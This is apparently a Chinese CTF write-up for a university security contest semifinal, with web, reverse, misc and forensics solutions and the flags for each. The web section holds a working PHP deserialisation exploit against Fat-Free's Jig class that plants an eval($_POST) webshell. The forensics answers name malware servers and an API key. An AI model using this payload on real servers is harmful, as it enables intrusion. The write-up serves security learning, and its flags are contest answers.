当前位置:网站首页>第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛
第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛
2022-08-09 12:29:00 【Pysnow】
总榜38,地区第四: )
文章目录
CTF
web
easyfatfree:
www.zip 下载源码,这又是一道原题,wmctf2020 那个 rce 链子能用,但是因为 disable_fucntion 禁用得太狠了,代码执行也没什么办法,可以直接用 2020ciscn 拿到 easyunserialze 的写文件链子,(没有写文件的权限但是有覆盖文件的权限) 覆盖任意一个 php 文件,然后蚁剑连上就可以拿到 flag 了,因为蚁剑自带绕过 open_basir 的功能,给出 exp 如下https://blog.csdn.net/mochu7777777/article/details/108327699
<?php
namespace DB;
//! In-memory/flat-file DB wrapper
class Jig {
//@{ Storage formats
const
FORMAT_JSON=0,
FORMAT_Serialized=1;
//@}
protected
//! Storage location
$dir = '/var/www/html/',
//! Current storage format
$format = 'self::FORMAT_JSON',
//! Memory-held data
$data = array('lib/utf.php'=>array("a'=>'<?php eval(\$_POST['p']); ?>")),
//! lazy load/save files
$lazy = TRUE;
/** * Read data from memory/file * @return array * @param $file string **/
}
$jig = new jig();
echo urlencode(serialize($jig));
re
babynim
** 大数相除** **
除数
56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471被除数
**51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801
a = 56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471
b = 51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801
print(b//a)
flag{923973256239481267349126498121231231}
misc
神秘的日志
日志搜索 NTLM,发现有两个有两个时间点**
2022/4/17 11:27:06
2022/4/16 17:31:01
**在 security 日志中找到那个时间点的 NTLM,有五个,导出如下
一个一个 flag 试,发现最后一个 flag 提交正确**
**
flag:flag{dafd0428f634aefd1ddb26f8257c791f}
取证
手机取证_1
** iPhone 手机的 iBoot 固件版本号:(答案参考格式:iBoot-1.1.1)** **
用盘古石手机取证系统导入 iPhone 文件夹,查看设备信息,找到 iBoot 固件版本号。
**flag:iBoot-7429.62.1
exe 分析_1
将程序拖进微步云沙箱,可以看到启动进程位置
C:\Program Files\Common Files\Services\WmiApSvr.exe
exe 分析_2
拖进 ida 就可以看到导入 dll
答案是:是
exe 分析_3
用 x32dbg 调试程序
查看进程的详细信息就可以找到程序名
exe 分析_4
在微步云沙箱搜索文件的哈希值即文件名
挖矿程序
exe 分析_5
在虚拟机运行起来,通过 wireshark 看到一个 ip,查询位置
韩国
APK 分析_01
** 受害人手机中 exec 的序列号是:(答案参考格式:0xadc)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,模糊搜索 exec,找到应用,导出到桌面。用 jadx-gui 打开 apk,查看证书,找到序列号。
**flag:0x936eacbe07f201df
APK 分析_02
** 受害人手机中 exec 关联服务器地址是:(答案参考格式:asd.as.d)** **
** 使用 Jadx 分析 apk,首先看 MainActivity 主函数,发现有一个 Base64 加密后的密文,解密后得到明文: https://ansjk.ecxeio.xyz
** 分析代码发现这个加密算法是在 t( ) 方法里的,查找 t( ) 方法哪里被引用了,发现没有引用的地方,只能换个思路。t( ) 方法所在的 MainActivity 类继承 h 类,分析 h 类。** **
** 发现 t( ) 方法在 h 类中是一个抽象方法(没有方法体,只有声明。抽象方法的具体的实现在子类中,即 MainActivity 类里),随后又发现 loadUrl( ) 方法调用了 t( ) 方法。 **
**
** 说明 loadUrl( ) 加载了 t( ) 里的 https://ansjk.ecxeio.xyz,说明程序的服务器地址就是 t() 方法里的网址。
**flag:ansjk.ecxeio.xyz
APK 分析_03
** 受害人手机中 exec 加载服务器的函数是 :(答案参考格式:asda)** **
根据 APK 分析_02 的分析可知:exec 加载服务器的函数应该是:loadUrl( )
**flag:loadUrl
APK 分析_04
** 受害人手机中 exec 的打包 ID 是:(答案参考格式:adb.adb.cn)** **
根据答案参考格式,猜测 ID 是个网址,将文件拖进 AndroidKiller 里查看,搜索.cn,发现一个网址字符串。提交正确。
**flag:W2Anansjy.com.cn
APK 分析_05
** 受害人手机中 exec 的是否有安全检测行为?** **
查找字符串"安全",发现有检测手机 root 的提示,说明有安全检测。
**
flag:是
APK 分析_06
** 受害人手机中 exec 的检测方法的完整路径和方法名是:(答案参考格式:a.a.a())** **
** 找到字符串,所在方法是所在类 h,分析代码结合 MainActivity 主类中的方法,发现 h 类其实就是 MainActivity,程序将它单独拿出来了,MainActivity( ) 通过继承的方式进行调用,h 类实际是一个开发业务逻辑的类。** **
** 既然是开发业务逻辑的类,必然有安全检测的方法,分析代码,发现 onCreate() 方法中有安全检测,并有安全提醒的字符串。着重分析 onCreate() 方法中有安全提醒字符串这一部分。分析发现每一个安全提醒的字符串触发都是通过一个 if 判断,这个 if 判断条件里的方法都是 a 类中的方法,怀疑 a 类就是安全检测的类,跟进 a 类。** **
** 根据 a 类中的方法名,变量名可知,该类就是安全检测的类。 **
**flag:d.a.a.c.a.a()
APK 分析_07
** 受害人手机中 exec 有几个界面:(答案参考格式:2)** **
一个 APK 每创建一个界面(Activity),都要在 AndroidManifest.xml 中注册,查看 AndroidManifest.xml。发现注册了三个 activity,activity-alias 是为 activity 起了个别名,也就是说 com.kmcjrz.bsesai.newActivity 实际指的就是 minmtta.hemjcbm.ahibyws.MainActivity。
**flag:3
APK 分析_08
** 受害人手机中红星 IPA 的包名是:(答案参考格式:a.s.d)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,搜索红星,找到文件,导出。搜索可知 IPA 是 Apple 程序应用文件 iPhoneApplication 的缩写,简单来说就是 Apple 程序的 APK,实质还是一个压缩包,解压红星.ipa。
**
IPA 文件解压器解压,得到 ayload 文件,打开 Payload 文件,里面有对应的.app 文件,搜索 info.plist 文件,用 plist Editor 查看,搜索 bundle,找到包名。flag:com.dd666.hongxin
APK 分析_09
** 受害人手机中红星 IPA 的 APIKEY 是:(答案参考格式:asd)** **
在 info.plist 文件中,搜索 APIKEY 找到内容。
**flag:d395159c291c627c9d4ff9139bf8f0a700b98732
APK 分析_10
** 受害人手机中红星 IPA 的权限有哪些?** **
在 info.plist 文件中,寻找有关权限内容,发现四个权限申请。
**
flag:相册,定位,摄像头,麦克风
APK 分析_11
** 嫌疑人手机中红星 APK 的服务器地址是:(答案参考格式:ass.a.d:11)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,搜索红星,找到文件,导出。跟据提示要求寻找服务器网址,搜索字符串:“url”,发现与题目格式相一致的网址。
提交正确。
**flag:www.nansjy.com.cn:8161
APK 分析_12
** 嫌疑人手机中红星 APK 的程序入口是:(答案参考格式:a.v.b.n)** **
用 Android Killer 打开红星.apk,找到红星 APK 的程序入口名。
**
flag:com.example.weisitas526sad.activity.SplashActivity
APK 分析_13
** 嫌疑人手机中分析聊天工具,服务器的登录端口是:(答案参考格式:12)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,打开应用列表,寻找聊天应用,发现应用 BigAnt5 疑似聊天工具。网上搜索可得 BigAnt5 是聊天软件,搜索 BigAnt5 端口号。
**
搜索可得 BigAnt5 端口号为 6661。
flag:6661
服务器取证_05
通过观察我博客的宝塔面板,可以发现宝塔下载的软件存在于两个地方,/www/server 和/www/server/panel/plugin 这两个文件夹下,然后出去那几个不是软件的文件,计算出来如下**
**
linuxsys webshh mysql nginx php phpmyadmin
答案:6
服务器取证_15
计算机取证,搜索关键词你好**
在此基础上搜索 怎么充值找到一个数据库备份文件,然后导出打开它
搜索关键词找到用户名为
**答案:hm688
边栏推荐
- 正则引擎的几种分类
- Flutter入门进阶之旅(十)Dialog&Toast
- FFmpeg在win10上编译安装(配置libx264)
- Redis源码剖析之robj(redisObject)
- MySQL备份与恢复 (转载非原创)
- OOM排查和处理
- Ten minutes to teach you how to use VitePress to build and deploy a personal blog site
- #Internet of Things essay#Xiaoxiong pie equipment development actual combat
- WebView injects Js code to realize large image adaptive screen click image preview details
- 我的2020年终总结
猜你喜欢
ViewPager fragments of nested data blank page abnormal problem analysis
1小时直播招募令:行业大咖干货分享,企业报名开启丨量子位·视点
Customize VIEW to realize in-app message reminder to rotate up and down
超越CLIP的多模态模型,只需不到1%的训练数据!南加大最新研究来了
Nature:猪死亡1小时后,器官再次运转
内网穿透工具ngrok使用教程
报告:想学AI的学生数量已涨200%,老师都不够用了
曼城推出可检测情绪的智能围巾,把球迷给整迷惑了
【HCIP持续更新】IS-IS协议原理与配置
Flutter Getting Started and Advanced Tour (8) Button Widget
随机推荐
Fragment中嵌套ViewPager数据空白页异常问题分析
SQL Server查询优化 (转载非原创)
内网穿透工具ngrok使用教程
保存Simulink仿真模型为图片或者PDF的方法
荣耀携手Blue Yonder,加快企业战略增长
GPT-3组合DALL·E,60秒内搞定游戏设定和原型动画!网友看后:这游戏想玩
大佬们,请教一下,我看官方文档中,sqlserver cdc只支持2012版之后的,对于sqlser
Flutter Getting Started and Advanced Tour (4) Text Input Widget TextField
数据挖掘-05
世界第4疯狂的科学家,在103岁生日那天去世了
【TKE】GR+VPC-CNI混用模式下未产品化功能配置
Ten minutes to teach you how to use VitePress to build and deploy a personal blog site
30行代码实现蚂蚁森林自动偷能量
技术分享 | 接口自动化测试如何处理 Header cookie
Report: The number of students who want to learn AI has increased by 200%, and there are not enough teachers
位图与位运算
使用RecyclerView实现三级折叠列表
go基础之web获取参数
AI篮球裁判火了,走步算得特别准,就问哈登慌不慌
工作任务统计